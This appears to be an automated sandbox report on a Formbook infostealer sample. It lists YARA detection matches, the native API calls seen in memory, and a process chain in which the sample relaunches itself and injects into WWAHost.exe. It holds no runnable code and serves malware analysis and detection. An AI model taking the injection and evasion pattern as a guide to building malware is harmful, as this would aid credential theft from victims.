          Source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00419D50 NtCreateFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00419E00 NtReadFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00419E80 NtClose,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00419DFB NtReadFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00419F2B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009DB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009DA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009DAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9560 NtWriteFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009DA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009DA770 NtOpenThread,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419D50 NtCreateFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419E00 NtReadFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419E80 NtClose,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419DFB NtReadFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00419F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249E00 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249E80 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249F2B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03249DFB NtReadFile,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00404853
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00406131
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_740D1A98
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041E071
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0041E5FC
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00409E30
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AB090
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A620A8
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C20A0
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A628EC
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6E824
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A51002
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA830
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B99BF
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099F900
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B4120
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A622AE
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54AEF
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A4FA2B
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CEBB0
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CABD8
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A423E3
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5DBD2
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A503DA
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A62B28
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BA309
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAB40
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A54496
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A841F
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5D466
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB477
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009C2581
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A52D82
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AD5E0
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A625DD
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A62D07
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00990D20
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A61D55
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A62EF7
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009B6E30
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5D616
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A61FF1
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6DFCE
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041E071
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_0041E5FC
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00402D87
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00409E30
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED03DA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDDBD2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3AB40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE2B28
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE22AE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ECFA2B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E34120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE28EC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E420A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE20A8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EEE824
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A830
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED1002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE1FF1
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EEDFCE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE2EF7
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E36E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDD616
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE25DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E42581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE1D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E10D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE2D07
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDD466
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324E071
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03232FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03239E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03232D87
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03232D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_0324E5FC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 03E1B150 appears 54 times
          Source: C:\Users\user\Desktop\444890321.exeCode function: String function: 0041BBD0 appears 38 times
          Source: C:\Users\user\Desktop\444890321.exeCode function: String function: 0099B150 appears 136 times
          Source: 444890321.exe, 00000000.00000003.204714457.0000000009C6F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 444890321.exe
          Source: 444890321.exe, 00000001.00000002.265683363.0000000002766000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs 444890321.exe
          Source: 444890321.exe, 00000001.00000002.265126021.0000000000A8F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 444890321.exe
          Source: 444890321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/3
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\444890321.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
          Source: C:\Users\user\Desktop\444890321.exeFile created: C:\Users\user\AppData\Local\Temp\nskAF62.tmpJump to behavior
          Source: 444890321.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\444890321.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\444890321.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 444890321.exeMetadefender: Detection: 17%
          Source: 444890321.exeReversingLabs: Detection: 67%
          Source: C:\Users\user\Desktop\444890321.exeFile read: C:\Users\user\Desktop\444890321.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\444890321.exe 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Users\user\Desktop\444890321.exeProcess created: C:\Users\user\Desktop\444890321.exe 'C:\Users\user\Desktop\444890321.exe'
          Source: C:\Users\user\Desktop\444890321.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
